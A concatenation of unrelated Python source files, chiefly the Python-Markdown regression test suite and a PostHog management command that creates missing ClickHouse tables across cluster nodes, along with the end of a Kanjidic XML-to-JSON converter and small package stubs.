if ele.tag.lower() == "reading":
if ele.attrib:
if ele.attrib['r_type'] == "ja_on":
new['reading']['on'].append(ele.text)
elif ele.attrib['r_type'] == "ja_kun":
new['reading']['kun'].append(ele.text)
elif ele.tag.lower() == "meaning":
if ele.attrib:
if ele.attrib['m_lang'] == "en":
new["meaning"].append(ele.text)
else:
new['meaning'].append(ele.text)
def parse_readings(elements, new):
for ele in elements:
if ele.tag.lower() == "rmgroup":
parse_rmgroup(ele, new)
elif ele.tag.lower() == "nanori":
new['name_reading'].append(ele.text)
def xml_parser():
i = 0
f = ET.iterparse(FILE)
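    # iterparse streams the (potentially large) kanjidic2 XML file instead of
    # loading the whole document into memory at once.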
DATA = []
for event, elements in tqdm(f):
if event == 'end' and elements.tag == 'character':
new_ele = copy.deepcopy(TEMPLATE)
for ele in elements.iter():
if ele.tag.lower() == "literal":
parse_literal(ele, new_ele)
elif ele.tag.lower() == "reading_meaning":
parse_readings(ele, new_ele)
elif ele.tag.lower() == "misc":
parse_misc(ele, new_ele)
DATA.append(new_ele)
return {"words": DATA}
def xml_to_json():
""" Convert xml to json and save to file """
file = open("Kanjidic.json", "w", encoding="utf8")
print("Beginning conversion of Kanjidic")
json.dump(xml_parser(), file, indent=2, ensure_ascii=False)
print("Conversion finished")
print("Saving to file...")
file.close()
if __name__ == "__main__":
xml_to_json() |
py | 1a38be6e6a4c724bcc4e0caa8c10161b937b8b20 | """
Python Markdown
A Python implementation of John Gruber's Markdown.
Documentation: https://python-markdown.github.io/
GitHub: https://github.com/Python-Markdown/markdown/
PyPI: https://pypi.org/project/Markdown/
Started by Manfred Stienstra (http://www.dwerg.net/).
Maintained for a few years by Yuri Takhteyev (http://www.freewisdom.org).
Currently maintained by Waylan Limberg (https://github.com/waylan),
Dmitry Shachnev (https://github.com/mitya57) and Isaac Muse (https://github.com/facelessuser).
Copyright 2007-2018 The Python Markdown Project (v. 1.7 and later)
Copyright 2004, 2005, 2006 Yuri Takhteyev (v. 0.2-1.6b)
Copyright 2004 Manfred Stienstra (the original version)
License: BSD (see LICENSE.md for details).
Python-Markdown Regression Tests
================================
Tests of the various APIs with the python markdown lib.
"""
import unittest
import sys
import os
import markdown
import warnings
from markdown.__main__ import parse_options
from logging import DEBUG, WARNING, CRITICAL
import yaml
import tempfile
from io import BytesIO
import xml.etree.ElementTree as etree
from xml.etree.ElementTree import ProcessingInstruction
class TestMarkdownBasics(unittest.TestCase):
""" Tests basics of the Markdown class. """
def setUp(self):
""" Create instance of Markdown. """
self.md = markdown.Markdown()
def testBlankInput(self):
""" Test blank input. """
self.assertEqual(self.md.convert(''), '')
def testWhitespaceOnly(self):
""" Test input of only whitespace. """
self.assertEqual(self.md.convert(' '), '')
def testSimpleInput(self):
""" Test simple input. """
self.assertEqual(self.md.convert('foo'), '<p>foo</p>')
def testInstanceExtension(self):
""" Test Extension loading with a class instance. """
from markdown.extensions.footnotes import FootnoteExtension
markdown.Markdown(extensions=[FootnoteExtension()])
def testEntryPointExtension(self):
""" Test Extension loading with an entry point. """
markdown.Markdown(extensions=['footnotes'])
def testDotNotationExtension(self):
""" Test Extension loading with Name (`path.to.module`). """
markdown.Markdown(extensions=['markdown.extensions.footnotes'])
def testDotNotationExtensionWithClass(self):
""" Test Extension loading with class name (`path.to.module:Class`). """
markdown.Markdown(extensions=['markdown.extensions.footnotes:FootnoteExtension'])
class TestConvertFile(unittest.TestCase):
""" Tests of ConvertFile. """
def setUp(self):
self.saved = sys.stdin, sys.stdout
sys.stdin = BytesIO(bytes('foo', encoding='utf-8'))
sys.stdout = BytesIO()
def tearDown(self):
sys.stdin, sys.stdout = self.saved
def getTempFiles(self, src):
""" Return the file names for two temp files. """
infd, infile = tempfile.mkstemp(suffix='.txt')
with os.fdopen(infd, 'w') as fp:
fp.write(src)
outfd, outfile = tempfile.mkstemp(suffix='.html')
return infile, outfile, outfd
def testFileNames(self):
infile, outfile, outfd = self.getTempFiles('foo')
markdown.markdownFromFile(input=infile, output=outfile)
with os.fdopen(outfd, 'r') as fp:
output = fp.read()
self.assertEqual(output, '<p>foo</p>')
def testFileObjects(self):
infile = BytesIO(bytes('foo', encoding='utf-8'))
outfile = BytesIO()
markdown.markdownFromFile(input=infile, output=outfile)
outfile.seek(0)
self.assertEqual(outfile.read().decode('utf-8'), '<p>foo</p>')
def testStdinStdout(self):
markdown.markdownFromFile()
sys.stdout.seek(0)
self.assertEqual(sys.stdout.read().decode('utf-8'), '<p>foo</p>')
class TestBlockParser(unittest.TestCase):
""" Tests of the BlockParser class. """
def setUp(self):
""" Create instance of BlockParser. """
self.parser = markdown.Markdown().parser
def testParseChunk(self):
""" Test BlockParser.parseChunk. """
root = etree.Element("div")
text = 'foo'
self.parser.parseChunk(root, text)
self.assertEqual(
markdown.serializers.to_xhtml_string(root),
"<div><p>foo</p></div>"
)
def testParseDocument(self):
""" Test BlockParser.parseDocument. """
lines = ['#foo', '', 'bar', '', ' baz']
tree = self.parser.parseDocument(lines)
self.assertIsInstance(tree, etree.ElementTree)
self.assertIs(etree.iselement(tree.getroot()), True)
self.assertEqual(
markdown.serializers.to_xhtml_string(tree.getroot()),
"<div><h1>foo</h1><p>bar</p><pre><code>baz\n</code></pre></div>"
)
class TestBlockParserState(unittest.TestCase):
""" Tests of the State class for BlockParser. """
def setUp(self):
self.state = markdown.blockparser.State()
def testBlankState(self):
""" Test State when empty. """
self.assertEqual(self.state, [])
def testSetSate(self):
""" Test State.set(). """
self.state.set('a_state')
self.assertEqual(self.state, ['a_state'])
self.state.set('state2')
self.assertEqual(self.state, ['a_state', 'state2'])
    def testIsState(self):
""" Test State.isstate(). """
self.assertEqual(self.state.isstate('anything'), False)
self.state.set('a_state')
self.assertEqual(self.state.isstate('a_state'), True)
self.state.set('state2')
self.assertEqual(self.state.isstate('state2'), True)
self.assertEqual(self.state.isstate('a_state'), False)
self.assertEqual(self.state.isstate('missing'), False)
def testReset(self):
""" Test State.reset(). """
self.state.set('a_state')
self.state.reset()
self.assertEqual(self.state, [])
self.state.set('state1')
self.state.set('state2')
self.state.reset()
self.assertEqual(self.state, ['state1'])
class TestHtmlStash(unittest.TestCase):
""" Test Markdown's HtmlStash. """
def setUp(self):
self.stash = markdown.util.HtmlStash()
self.placeholder = self.stash.store('foo')
def testSimpleStore(self):
""" Test HtmlStash.store. """
self.assertEqual(self.placeholder, self.stash.get_placeholder(0))
self.assertEqual(self.stash.html_counter, 1)
self.assertEqual(self.stash.rawHtmlBlocks, ['foo'])
def testStoreMore(self):
""" Test HtmlStash.store with additional blocks. """
placeholder = self.stash.store('bar')
self.assertEqual(placeholder, self.stash.get_placeholder(1))
self.assertEqual(self.stash.html_counter, 2)
self.assertEqual(
self.stash.rawHtmlBlocks,
['foo', 'bar']
)
def testReset(self):
""" Test HtmlStash.reset. """
self.stash.reset()
self.assertEqual(self.stash.html_counter, 0)
self.assertEqual(self.stash.rawHtmlBlocks, [])
class Item:
""" A dummy Registry item object for testing. """
def __init__(self, data):
self.data = data
def __repr__(self):
return repr(self.data)
def __eq__(self, other):
return self.data == other
class RegistryTests(unittest.TestCase):
""" Test the processor registry. """
def testCreateRegistry(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
self.assertEqual(len(r), 1)
self.assertIsInstance(r, markdown.util.Registry)
def testRegisterWithoutPriority(self):
r = markdown.util.Registry()
with self.assertRaises(TypeError):
r.register(Item('a'))
def testSortRegistry(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 21)
r.register(Item('c'), 'c', 20.5)
self.assertEqual(len(r), 3)
self.assertEqual(list(r), ['b', 'c', 'a'])
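        # Higher priority sorts first: 21 ('b') > 20.5 ('c') > 20 ('a').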
def testIsSorted(self):
r = markdown.util.Registry()
self.assertIs(r._is_sorted, False)
r.register(Item('a'), 'a', 20)
list(r)
self.assertIs(r._is_sorted, True)
r.register(Item('b'), 'b', 21)
self.assertIs(r._is_sorted, False)
r['a']
self.assertIs(r._is_sorted, True)
r._is_sorted = False
r.get_index_for_name('a')
self.assertIs(r._is_sorted, True)
r._is_sorted = False
repr(r)
self.assertIs(r._is_sorted, True)
def testDeregister(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
r.register(Item('c'), 'c', 40)
self.assertEqual(len(r), 3)
r.deregister('b')
self.assertEqual(len(r), 2)
r.deregister('c', strict=False)
self.assertEqual(len(r), 1)
# deregister non-existent item with strict=False
r.deregister('d', strict=False)
self.assertEqual(len(r), 1)
with self.assertRaises(ValueError):
# deregister non-existent item with strict=True
r.deregister('e')
self.assertEqual(list(r), ['a'])
def testRegistryContains(self):
r = markdown.util.Registry()
item = Item('a')
r.register(item, 'a', 20)
self.assertIs('a' in r, True)
self.assertIn(item, r)
self.assertNotIn('b', r)
def testRegistryIter(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(list(r), ['b', 'a'])
def testRegistryGetItemByIndex(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r[0], 'b')
self.assertEqual(r[1], 'a')
with self.assertRaises(IndexError):
r[3]
def testRegistryGetItemByItem(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r['a'], 'a')
self.assertEqual(r['b'], 'b')
with self.assertRaises(KeyError):
r['c']
def testRegistrySetItem(self):
r = markdown.util.Registry()
with self.assertRaises(TypeError):
r[0] = 'a'
with self.assertRaises(TypeError):
r['a'] = 'a'
def testRegistryDelItem(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
with self.assertRaises(TypeError):
del r[0]
with self.assertRaises(TypeError):
del r['a']
def testRegistrySlice(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
r.register(Item('c'), 'c', 40)
slc = r[1:]
self.assertEqual(len(slc), 2)
self.assertIsInstance(slc, markdown.util.Registry)
self.assertEqual(list(slc), ['b', 'a'])
def testGetIndexForName(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r.get_index_for_name('a'), 1)
self.assertEqual(r.get_index_for_name('b'), 0)
with self.assertRaises(ValueError):
r.get_index_for_name('c')
    def testRegisterDuplicate(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b1'), 'b', 10)
self.assertEqual(list(r), ['a', 'b1'])
self.assertEqual(len(r), 2)
r.register(Item('b2'), 'b', 30)
self.assertEqual(len(r), 2)
self.assertEqual(list(r), ['b2', 'a'])
class TestErrors(unittest.TestCase):
""" Test Error Reporting. """
def setUp(self):
# Set warnings to be raised as errors
warnings.simplefilter('error')
def tearDown(self):
# Reset warning behavior back to default
warnings.simplefilter('default')
def testBadOutputFormat(self):
""" Test failure on bad output_format. """
self.assertRaises(KeyError, markdown.Markdown, output_format='invalid')
def testLoadExtensionFailure(self):
""" Test failure of an extension to load. """
self.assertRaises(
ImportError,
markdown.Markdown, extensions=['non_existant_ext']
)
def testLoadBadExtension(self):
""" Test loading of an Extension with no makeExtension function. """
self.assertRaises(AttributeError, markdown.Markdown, extensions=['markdown.util'])
def testNonExtension(self):
""" Test loading a non Extension object as an extension. """
self.assertRaises(TypeError, markdown.Markdown, extensions=[object])
def testDotNotationExtensionWithBadClass(self):
""" Test Extension loading with non-existent class name (`path.to.module:Class`). """
self.assertRaises(
AttributeError,
markdown.Markdown,
extensions=['markdown.extensions.footnotes:MissingExtension']
)
    def testBaseExtension(self):
        """ Test that the base Extension class raises NotImplementedError. """
self.assertRaises(
NotImplementedError,
markdown.Markdown, extensions=[markdown.extensions.Extension()]
)
class testETreeComments(unittest.TestCase):
"""
Test that ElementTree Comments work.
These tests should only be a concern when using cElementTree with third
party serializers (including markdown's (x)html serializer). While markdown
doesn't use ElementTree.Comment itself, we should certainly support any
third party extensions which may. Therefore, these tests are included to
ensure such support is maintained.
"""
def setUp(self):
# Create comment node
self.comment = etree.Comment('foo')
def testCommentIsComment(self):
""" Test that an ElementTree Comment passes the `is Comment` test. """
self.assertIs(self.comment.tag, etree.Comment)
def testCommentIsBlockLevel(self):
""" Test that an ElementTree Comment is recognized as BlockLevel. """
md = markdown.Markdown()
self.assertIs(md.is_block_level(self.comment.tag), False)
def testCommentSerialization(self):
""" Test that an ElementTree Comment serializes properly. """
self.assertEqual(
markdown.serializers.to_html_string(self.comment),
'<!--foo-->'
)
def testCommentPrettify(self):
""" Test that an ElementTree Comment is prettified properly. """
pretty = markdown.treeprocessors.PrettifyTreeprocessor(markdown.Markdown())
pretty.run(self.comment)
self.assertEqual(
markdown.serializers.to_html_string(self.comment),
'<!--foo-->\n'
)
class testElementTailTests(unittest.TestCase):
""" Element Tail Tests """
def setUp(self):
self.pretty = markdown.treeprocessors.PrettifyTreeprocessor(markdown.Markdown())
def testBrTailNoNewline(self):
""" Test that last <br> in tree has a new line tail """
root = etree.Element('root')
br = etree.SubElement(root, 'br')
self.assertEqual(br.tail, None)
self.pretty.run(root)
self.assertEqual(br.tail, "\n")
class testElementPreCodeTests(unittest.TestCase):
""" Element PreCode Tests """
def setUp(self):
md = markdown.Markdown()
self.pretty = markdown.treeprocessors.PrettifyTreeprocessor(md)
def prettify(self, xml):
root = etree.fromstring(xml)
self.pretty.run(root)
return etree.tostring(root, encoding="unicode", short_empty_elements=False)
def testPreCodeEmpty(self):
xml = "<pre><code></code></pre>"
expected = "<pre><code></code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithChildren(self):
xml = "<pre><code> <span /></code></pre>"
expected = "<pre><code> <span></span></code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithSpaceOnly(self):
xml = "<pre><code> </code></pre>"
expected = "<pre><code>\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithText(self):
xml = "<pre><code> hello</code></pre>"
expected = "<pre><code> hello\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithTrailingSpace(self):
xml = "<pre><code> hello </code></pre>"
expected = "<pre><code> hello\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
class testSerializers(unittest.TestCase):
""" Test the html and xhtml serializers. """
def testHtml(self):
""" Test HTML serialization. """
el = etree.Element('div')
el.set('id', 'foo<&">')
p = etree.SubElement(el, 'p')
p.text = 'foo <&escaped>'
p.set('hidden', 'hidden')
etree.SubElement(el, 'hr')
non_element = etree.SubElement(el, None)
non_element.text = 'non-element text'
script = etree.SubElement(non_element, 'script')
script.text = '<&"test\nescaping">'
el.tail = "tail text"
self.assertEqual(
markdown.serializers.to_html_string(el),
'<div id="foo<&">">'
'<p hidden>foo <&escaped></p>'
'<hr>'
'non-element text'
'<script><&"test\nescaping"></script>'
'</div>tail text'
)
def testXhtml(self):
"""" Test XHTML serialization. """
el = etree.Element('div')
el.set('id', 'foo<&">')
p = etree.SubElement(el, 'p')
p.text = 'foo<&escaped>'
p.set('hidden', 'hidden')
etree.SubElement(el, 'hr')
non_element = etree.SubElement(el, None)
non_element.text = 'non-element text'
script = etree.SubElement(non_element, 'script')
script.text = '<&"test\nescaping">'
el.tail = "tail text"
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div id="foo<&">">'
'<p hidden="hidden">foo<&escaped></p>'
'<hr />'
'non-element text'
'<script><&"test\nescaping"></script>'
'</div>tail text'
)
def testMixedCaseTags(self):
"""" Test preservation of tag case. """
el = etree.Element('MixedCase')
el.text = 'not valid '
em = etree.SubElement(el, 'EMPHASIS')
em.text = 'html'
etree.SubElement(el, 'HR')
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<MixedCase>not valid <EMPHASIS>html</EMPHASIS><HR /></MixedCase>'
)
    def testProcessingInstruction(self):
        """ Test serialization of ProcessingInstruction. """
pi = ProcessingInstruction('foo', text='<&"test\nescaping">')
self.assertIs(pi.tag, ProcessingInstruction)
self.assertEqual(
markdown.serializers.to_xhtml_string(pi),
'<?foo <&"test\nescaping">?>'
)
def testQNameTag(self):
""" Test serialization of QName tag. """
div = etree.Element('div')
qname = etree.QName('http://www.w3.org/1998/Math/MathML', 'math')
math = etree.SubElement(div, qname)
math.set('display', 'block')
sem = etree.SubElement(math, 'semantics')
msup = etree.SubElement(sem, 'msup')
mi = etree.SubElement(msup, 'mi')
mi.text = 'x'
mn = etree.SubElement(msup, 'mn')
mn.text = '2'
ann = etree.SubElement(sem, 'annotations')
ann.text = 'x^2'
self.assertEqual(
markdown.serializers.to_xhtml_string(div),
'<div>'
'<math display="block" xmlns="http://www.w3.org/1998/Math/MathML">'
'<semantics>'
'<msup>'
'<mi>x</mi>'
'<mn>2</mn>'
'</msup>'
'<annotations>x^2</annotations>'
'</semantics>'
'</math>'
'</div>'
)
def testQNameAttribute(self):
""" Test serialization of QName attribute. """
div = etree.Element('div')
div.set(etree.QName('foo'), etree.QName('bar'))
self.assertEqual(
markdown.serializers.to_xhtml_string(div),
'<div foo="bar"></div>'
)
def testBadQNameTag(self):
""" Test serialization of QName with no tag. """
qname = etree.QName('http://www.w3.org/1998/Math/MathML')
el = etree.Element(qname)
self.assertRaises(ValueError, markdown.serializers.to_xhtml_string, el)
def testQNameEscaping(self):
""" Test QName escaping. """
qname = etree.QName('<&"test\nescaping">', 'div')
el = etree.Element(qname)
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div xmlns="<&"test escaping">"></div>'
)
def testQNamePreEscaping(self):
""" Test QName that is already partially escaped. """
qname = etree.QName('<&"test escaping">', 'div')
el = etree.Element(qname)
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div xmlns="<&"test escaping">"></div>'
)
def buildExtension(self):
""" Build an extension which registers fakeSerializer. """
def fakeSerializer(elem):
# Ignore input and return hardcoded output
return '<div><p>foo</p></div>'
class registerFakeSerializer(markdown.extensions.Extension):
def extendMarkdown(self, md):
md.output_formats['fake'] = fakeSerializer
return registerFakeSerializer()
def testRegisterSerializer(self):
self.assertEqual(
markdown.markdown(
'baz', extensions=[self.buildExtension()], output_format='fake'
),
'<p>foo</p>'
)
def testXHTMLOutput(self):
self.assertEqual(
markdown.markdown('foo \nbar', output_format='xhtml'),
'<p>foo<br />\nbar</p>'
)
def testHTMLOutput(self):
self.assertEqual(
markdown.markdown('foo \nbar', output_format='html'),
'<p>foo<br>\nbar</p>'
)
class testAtomicString(unittest.TestCase):
""" Test that AtomicStrings are honored (not parsed). """
def setUp(self):
md = markdown.Markdown()
self.inlineprocessor = md.treeprocessors['inline']
def testString(self):
""" Test that a regular string is parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = 'some *text*'
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>some <em>text</em></p></div>'
)
def testSimpleAtomicString(self):
""" Test that a simple AtomicString is not parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = markdown.util.AtomicString('some *text*')
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>some *text*</p></div>'
)
def testNestedAtomicString(self):
""" Test that a nested AtomicString is not parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = markdown.util.AtomicString('*some* ')
span1 = etree.SubElement(p, 'span')
span1.text = markdown.util.AtomicString('*more* ')
span2 = etree.SubElement(span1, 'span')
span2.text = markdown.util.AtomicString('*text* ')
span3 = etree.SubElement(span2, 'span')
span3.text = markdown.util.AtomicString('*here*')
span3.tail = markdown.util.AtomicString(' *to*')
span2.tail = markdown.util.AtomicString(' *test*')
span1.tail = markdown.util.AtomicString(' *with*')
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>*some* <span>*more* <span>*text* <span>*here*</span> '
'*to*</span> *test*</span> *with*</p></div>'
)
class TestConfigParsing(unittest.TestCase):
def assertParses(self, value, result):
self.assertIs(markdown.util.parseBoolValue(value, False), result)
def testBooleansParsing(self):
self.assertParses(True, True)
self.assertParses('novalue', None)
self.assertParses('yES', True)
self.assertParses('FALSE', False)
self.assertParses(0., False)
self.assertParses('none', False)
def testPreserveNone(self):
self.assertIsNone(markdown.util.parseBoolValue('None', preserve_none=True))
self.assertIsNone(markdown.util.parseBoolValue(None, preserve_none=True))
def testInvalidBooleansParsing(self):
self.assertRaises(ValueError, markdown.util.parseBoolValue, 'novalue')
class TestCliOptionParsing(unittest.TestCase):
""" Test parsing of Command Line Interface Options. """
def setUp(self):
self.default_options = {
'input': None,
'output': None,
'encoding': None,
'output_format': 'xhtml',
'lazy_ol': True,
'extensions': [],
'extension_configs': {},
}
self.tempfile = ''
def tearDown(self):
if os.path.isfile(self.tempfile):
os.remove(self.tempfile)
def testNoOptions(self):
options, logging_level = parse_options([])
self.assertEqual(options, self.default_options)
self.assertEqual(logging_level, CRITICAL)
def testQuietOption(self):
options, logging_level = parse_options(['-q'])
self.assertGreater(logging_level, CRITICAL)
def testVerboseOption(self):
options, logging_level = parse_options(['-v'])
self.assertEqual(logging_level, WARNING)
def testNoisyOption(self):
options, logging_level = parse_options(['--noisy'])
self.assertEqual(logging_level, DEBUG)
def testInputFileOption(self):
options, logging_level = parse_options(['foo.txt'])
self.default_options['input'] = 'foo.txt'
self.assertEqual(options, self.default_options)
def testOutputFileOption(self):
options, logging_level = parse_options(['-f', 'foo.html'])
self.default_options['output'] = 'foo.html'
self.assertEqual(options, self.default_options)
def testInputAndOutputFileOptions(self):
options, logging_level = parse_options(['-f', 'foo.html', 'foo.txt'])
self.default_options['output'] = 'foo.html'
self.default_options['input'] = 'foo.txt'
self.assertEqual(options, self.default_options)
def testEncodingOption(self):
options, logging_level = parse_options(['-e', 'utf-8'])
self.default_options['encoding'] = 'utf-8'
self.assertEqual(options, self.default_options)
def testOutputFormatOption(self):
options, logging_level = parse_options(['-o', 'html'])
self.default_options['output_format'] = 'html'
self.assertEqual(options, self.default_options)
def testNoLazyOlOption(self):
options, logging_level = parse_options(['-n'])
self.default_options['lazy_ol'] = False
self.assertEqual(options, self.default_options)
def testExtensionOption(self):
options, logging_level = parse_options(['-x', 'markdown.extensions.footnotes'])
self.default_options['extensions'] = ['markdown.extensions.footnotes']
self.assertEqual(options, self.default_options)
def testMultipleExtensionOptions(self):
options, logging_level = parse_options([
'-x', 'markdown.extensions.footnotes',
'-x', 'markdown.extensions.smarty'
])
self.default_options['extensions'] = [
'markdown.extensions.footnotes',
'markdown.extensions.smarty'
]
self.assertEqual(options, self.default_options)
def create_config_file(self, config):
""" Helper to create temp config files. """
if not isinstance(config, str):
# convert to string
config = yaml.dump(config)
fd, self.tempfile = tempfile.mkstemp('.yml')
with os.fdopen(fd, 'w') as fp:
fp.write(config)
def testExtensionConfigOption(self):
config = {
'markdown.extensions.wikilinks': {
'base_url': 'http://example.com/',
'end_url': '.html',
'html_class': 'test',
},
'markdown.extensions.footnotes:FootnotesExtension': {
'PLACE_MARKER': '~~~footnotes~~~'
}
}
self.create_config_file(config)
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
    def testBoolExtensionConfigOption(self):
config = {
'markdown.extensions.toc': {
'title': 'Some Title',
'anchorlink': True,
'permalink': True
}
}
self.create_config_file(config)
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
def testExtensionConfigOptionAsJSON(self):
config = {
'markdown.extensions.wikilinks': {
'base_url': 'http://example.com/',
'end_url': '.html',
'html_class': 'test',
},
'markdown.extensions.footnotes:FootnotesExtension': {
'PLACE_MARKER': '~~~footnotes~~~'
}
}
import json
self.create_config_file(json.dumps(config))
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
def testExtensionConfigOptionMissingFile(self):
self.assertRaises(IOError, parse_options, ['-c', 'missing_file.yaml'])
def testExtensionConfigOptionBadFormat(self):
config = """
[footnotes]
PLACE_MARKER= ~~~footnotes~~~
"""
self.create_config_file(config)
self.assertRaises(yaml.YAMLError, parse_options, ['-c', self.tempfile])
class TestEscapeAppend(unittest.TestCase):
""" Tests escape character append. """
def testAppend(self):
""" Test that appended escapes are only in the current instance. """
md = markdown.Markdown()
md.ESCAPED_CHARS.append('|')
self.assertEqual('|' in md.ESCAPED_CHARS, True)
md2 = markdown.Markdown()
self.assertEqual('|' not in md2.ESCAPED_CHARS, True)
class TestBlockAppend(unittest.TestCase):
""" Tests block kHTML append. """
def testBlockAppend(self):
""" Test that appended escapes are only in the current instance. """
md = markdown.Markdown()
md.block_level_elements.append('test')
self.assertEqual('test' in md.block_level_elements, True)
md2 = markdown.Markdown()
self.assertEqual('test' not in md2.block_level_elements, True)
class TestAncestorExclusion(unittest.TestCase):
""" Tests exclusion of tags in ancestor list. """
class AncestorExample(markdown.inlinepatterns.SimpleTagInlineProcessor):
""" Ancestor Test. """
ANCESTOR_EXCLUDES = ('a',)
def handleMatch(self, m, data):
""" Handle match. """
el = etree.Element(self.tag)
el.text = m.group(2)
return el, m.start(0), m.end(0)
class AncestorExtension(markdown.Extension):
def __init__(self, *args, **kwargs):
"""Initialize."""
self.config = {}
def extendMarkdown(self, md):
"""Modify inline patterns."""
pattern = r'(\+)([^\+]+)\1'
md.inlinePatterns.register(TestAncestorExclusion.AncestorExample(pattern, 'strong'), 'ancestor-test', 0)
def setUp(self):
"""Setup markdown object."""
self.md = markdown.Markdown(extensions=[TestAncestorExclusion.AncestorExtension()])
def test_ancestors(self):
""" Test that an extension can exclude parent tags. """
test = """
Some +test+ and a [+link+](http://test.com)
"""
result = """<p>Some <strong>test</strong> and a <a href="http://test.com">+link+</a></p>"""
self.md.reset()
self.assertEqual(self.md.convert(test), result)
def test_ancestors_tail(self):
""" Test that an extension can exclude parent tags when dealing with a tail. """
test = """
[***+em+*+strong+**](http://test.com)
"""
result = """<p><a href="http://test.com"><strong><em>+em+</em>+strong+</strong></a></p>"""
self.md.reset()
self.assertEqual(self.md.convert(test), result)
|
py | 1a38beee48a0c3835f6511c156410d11d5a5c23c | # Copyright 2021 c00k1ez (https://github.com/c00k1ez). All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__version__ = "0.0.1.5"
from .yttm_tokenizer import BPEWrapper
|
py | 1a38bf46d325d5e73b617a20d7e3ea564055d3ba | import re
from collections import defaultdict
from typing import Dict, Set
import structlog
from django.conf import settings
from django.core.management.base import BaseCommand
from ee.clickhouse.sql.schema import CREATE_TABLE_QUERIES, get_table_name
from posthog.client import sync_execute
logger = structlog.get_logger(__name__)
TableName = str
Query = str
HostName = str
class Command(BaseCommand):
help = "Synchronize schema across clickhouse cluster, creating missing tables on new nodes"
def add_arguments(self, parser):
parser.add_argument(
"--dry-run", action="store_true", help="Exits with a non-zero status if schema changes would be required."
)
def handle(self, *args, **options):
if not settings.CLICKHOUSE_REPLICATION or settings.MULTI_TENANCY:
logger.info("โ
Skipping non-replicated or cloud setup")
return
host_tables, create_table_queries, out_of_sync_hosts = self.analyze_cluster_tables()
if len(out_of_sync_hosts) > 0:
logger.info("Schema out of sync on some clickhouse nodes!", out_of_sync_hosts=out_of_sync_hosts)
if options.get("dry_run"):
exit(1)
else:
self.create_missing_tables(out_of_sync_hosts, create_table_queries)
logger.info("โ
All ClickHouse nodes schema in sync")
def analyze_cluster_tables(self):
table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))
rows = sync_execute(
"""
SELECT hostName() as host, name, create_table_query
FROM clusterAllReplicas(%(cluster)s, system, tables)
WHERE database = %(database)s
AND name IN %(table_names)s
""",
{
"cluster": settings.CLICKHOUSE_CLUSTER,
"database": settings.CLICKHOUSE_DATABASE,
"table_names": table_names,
},
)
host_tables: Dict[HostName, Set[TableName]] = defaultdict(set)
create_table_queries: Dict[TableName, Query] = {}
for host, table_name, create_table_query in rows:
host_tables[host].add(table_name)
create_table_queries[table_name] = create_table_query
return host_tables, create_table_queries, self.get_out_of_sync_hosts(host_tables)
def get_out_of_sync_hosts(self, host_tables: Dict[HostName, Set[TableName]]) -> Dict[HostName, Set[TableName]]:
table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))
out_of_sync = {}
for host, tables in host_tables.items():
missing_tables = set(table_names) - tables
if len(missing_tables) > 0:
out_of_sync[host] = missing_tables
return out_of_sync
def create_missing_tables(
self, out_of_sync_hosts: Dict[HostName, Set[TableName]], create_table_queries: Dict[TableName, Query]
):
missing_tables = set(table for tables in out_of_sync_hosts.values() for table in tables)
logger.info("Creating missing tables", missing_tables=missing_tables)
for table in missing_tables:
query = create_table_queries[table]
sync_execute(self.run_on_cluster(query))
def run_on_cluster(self, create_table_query: Query) -> Query:
return re.sub(
r"^CREATE TABLE (\S+)",
f"CREATE TABLE IF NOT EXISTS \\1 ON CLUSTER '{settings.CLICKHOUSE_CLUSTER}'",
create_table_query,
1,
)
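
# Illustrative rewrite performed by run_on_cluster (cluster name hypothetical):
#   CREATE TABLE sharded_events (...)
#   -> CREATE TABLE IF NOT EXISTS sharded_events ON CLUSTER 'posthog' (...)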
|
py | 1a38c00cd5793f440fc7273b825e31cfa7d4ac9d | from os.path import join, dirname
import mock
import pytest
from .base import all_products, active_products
from .. import environment
